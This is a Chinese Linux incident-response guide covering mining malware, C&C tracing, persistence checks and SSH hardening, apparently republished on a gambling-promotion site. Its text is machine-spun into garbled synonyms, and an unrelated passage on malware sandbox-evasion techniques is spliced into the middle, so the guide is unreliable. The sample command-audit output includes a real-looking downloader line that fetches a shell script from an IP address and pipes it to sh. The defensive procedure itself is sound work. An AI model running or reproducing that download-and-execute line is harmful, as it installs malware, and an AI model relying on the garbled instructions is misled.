【有用指南】最全Linux应急相应技能,看这一篇就够了 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

【有用指南】最全Linux应急相应技能,看这一篇就够了

申博_安全防护 申博 31次浏览 未收录 0个评论

申博电脑客户端

申博电脑客户端是一家以新闻资讯、民生反馈、政务发布为主的综合性互联网平台,菲律宾申博已经成为辐射范围最广、影响力最大的新闻门户网站。菲律宾申博以要闻发布、问政济宁、县区要闻、济宁新闻试听为主要内容,提供丰富优质的新闻资讯、突发事件的及时放送、精彩节目直播回看、“吃喝玩乐”周边服务,为您提供完美的视听感受,让你随时随地感受身边事。

,

概述

Linux环境下处置惩罚应急相应事宜往往会越发的辣手,因为比拟于Windows,Linux没有像Autorun、procexp如许的应急相应利器,也没有一致的应急相应处置惩罚流程。所以,这篇文章将会对Linux环境下的应急相应流程举行解说,而且供应每个环节中所用到的shell敕令,以协助人人疾速、体系化地处置惩罚Linux环境下的病毒。

处置惩罚Linux应急相应重要分为这4个环节: 辨认征象-> 消灭病毒-> 闭环兜底-> 体系加固。

1.首先从用户场景的主机非常征象动身,先辨认出病毒的可疑征象。

2.然后定位到详细的病毒历程以及病毒文件,举行消灭。

3.完成前2步还不够,病毒平常会经由过程一些自启动项及保卫顺序举行反复感染,所以我们要实行闭环兜底确保病毒不再被建立。

4.将主机上的病毒项消灭清洁后,末了就是举行体系加固了,防备病毒从Web再次入侵进来。

走完这4个环节,才算是一个应急相应流程的完毕。

01 辨认征象

第1个环节请求我们经由过程体系运转状况、平安设备告警,发明主机非常征象,以及确认病毒的可疑行动。

体系CPU是不是非常

罗列历程,CPU降序排序:top

CPU占用率凌驾70%且名字比较可疑的历程,大几率就是挖矿病毒了。

是不是存在可疑历程

罗列历程敕令行:ps -aux

病毒平常都照顾可疑的敕令行,当你发明敕令行中带有url等新鲜的字符串时,就要注重了,它许多是个病毒downloader。

平安网关有没有报警

从平安网关报警中辨认出要挟是最直接,但确认主机已感染了病毒只是第一步,接下来得定位,详细是哪一个历程在与C&C通讯。

监控与目的IP通讯的历程: while true; do netstat -antp | grep [ip]; done

偶然平安网关检测到的不全是歹意IP,另有多是个域名,这类情况下,域名对应的IP是变化的,我们不能直接用上述要领举行监控。

【有用指南】最全Linux应急相应技能,看这一篇就够了

我们能够先在host文件中增添一条划定规矩,将歹意域名重定向到一个随机的IP地点,然后对其举行监控。

【有用指南】最全Linux应急相应技能,看这一篇就够了

如许就可以获得与之通讯的歹意历程了。

有没有可疑汗青敕令

遍历主机汗青敕令,查找有没有歹意敕令:history

02 消灭病毒

从第1个环节追溯到的历程信息,将会协助我们定位到病毒历程&病毒文件,完成消灭。

完毕病毒历程

消灭可疑历程的历程链:

ps -elf | grep [pid]
kill -9 [pid]

删除病毒文件

常见沙箱绕过技术

常见沙箱绕过技术 延迟执行 有许多恶意软件都使用基于时间的绕过技术,主要是利用已知的Windows API来延迟恶意代码的执行,常用的API有NtDelayExecution, CreateWaitTableTImer, SetTimer。这些技术在沙箱识别出来之前非常流行。 GetTickCount 沙箱可以识别出恶意软件并通过加速代码执行的方式来进行应对,可以使用多种方法来进行加速检查。其中一种方法就是使用Windows API G

定位病毒历程对应的文件途径:

ls -al /proc/[pid]/exe
rm -f [exe_path]

【有用指南】最全Linux应急相应技能,看这一篇就够了

03 闭环兜底

搜检是不是存在可疑定时使命

罗列定时使命: crontab -l

检察anacron异步定时使命:cat /etc/anacrontab

搜检是不是存在可疑效劳

罗列主机一切效劳,检察是不是有歹意效劳:

service --status-all

搜检体系文件是不是被劫持

罗列体系文件夹的文件,按修正事宜排序检察7天内被修正过的文件:

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime +7 | xargs ls -la

搜检是不是存在病毒保卫历程

监控保卫历程的行动:lsof -p [pid]

【有用指南】最全Linux应急相应技能,看这一篇就够了

strace -tt  -T -e  trace=all  -p $pid

 

扫描是不是存在歹意驱动

罗列/扫描体系驱动:lsmod

【有用指南】最全Linux应急相应技能,看这一篇就够了

装置chkrootkit 举行扫描:

wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
tar zxvf chkrootkit.tar.gz
cd chkrootkit-0.52
make sense
./chkrootkit

装置rkhunter 举行扫描:

Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
tar -zxvf rkhunter-1.4.4.tar.gz
cd rkhunter-1.4.4
./installer.sh --install
rkhunter -c

04 体系加固

末了一个环节往往是人人比较轻易忘记的,Linux平台下90%的病毒是经由过程收集流传感染的,所以,你的主机之所以会感染病毒,大部分缘由也是因为Web平安防护不够,赶忙搜检一下。

修正SSH弱暗码

查询log主机上岸日记:

grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'

定位有爆破的源IP:

grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c

爆破日记的用户名暗码:

grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

SSH爆破是Linux病毒最经常运用的流传手腕,若存在弱暗码的主机很轻易被其他感染主机SSH爆破胜利,从而再次感染病毒。

增添敕令审计

为汗青的敕令增添登录的IP地点、实行敕令时候等信息:

[1] 保留1万条敕令:

sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile

[2] 在/etc/profile的文件尾部增添以下行数设置信息:

USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`if [ "$USER_IP" = "" ]thenUSER_IP=`hostname`fiexport HISTTIMEFORMAT="%F %T $USER_IP `whoami` "shopt -s histappendexport PROMPT_COMMAND="history -a"

[3] 让设置见效:

source /etc/profile

生成结果:76  2019-10-28 17:05:34 113.110.229.230 wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

打上罕见Web破绽补丁

structs2系列RCE破绽

thinkphp5.X RCE破绽

Redis未受权接见破绽

Confluence RCE破绽(CVE_2019_3396)

Drupal RCE破绽(CVE-2018-7600)

ThinkPHP RCE破绽(CVE-2019-9082)

末端

Linux平台下的歹意软件要挟以僵尸收集蠕虫和挖矿病毒为主,因为Linux大多作为效劳器暴露在公网,且Web运用的破绽屡见不鲜,所以很轻易被大范围入侵,如罕见的病毒:DDG、systemdMiner、BillGates、watchdogs、XorDDos,在许多Linux上都有。人人要养成不运用弱暗码、勤打补丁的好习惯。

原文地点: https://www.4hou.com/technology/21264.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明【有用指南】最全Linux应急相应技能,看这一篇就够了
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址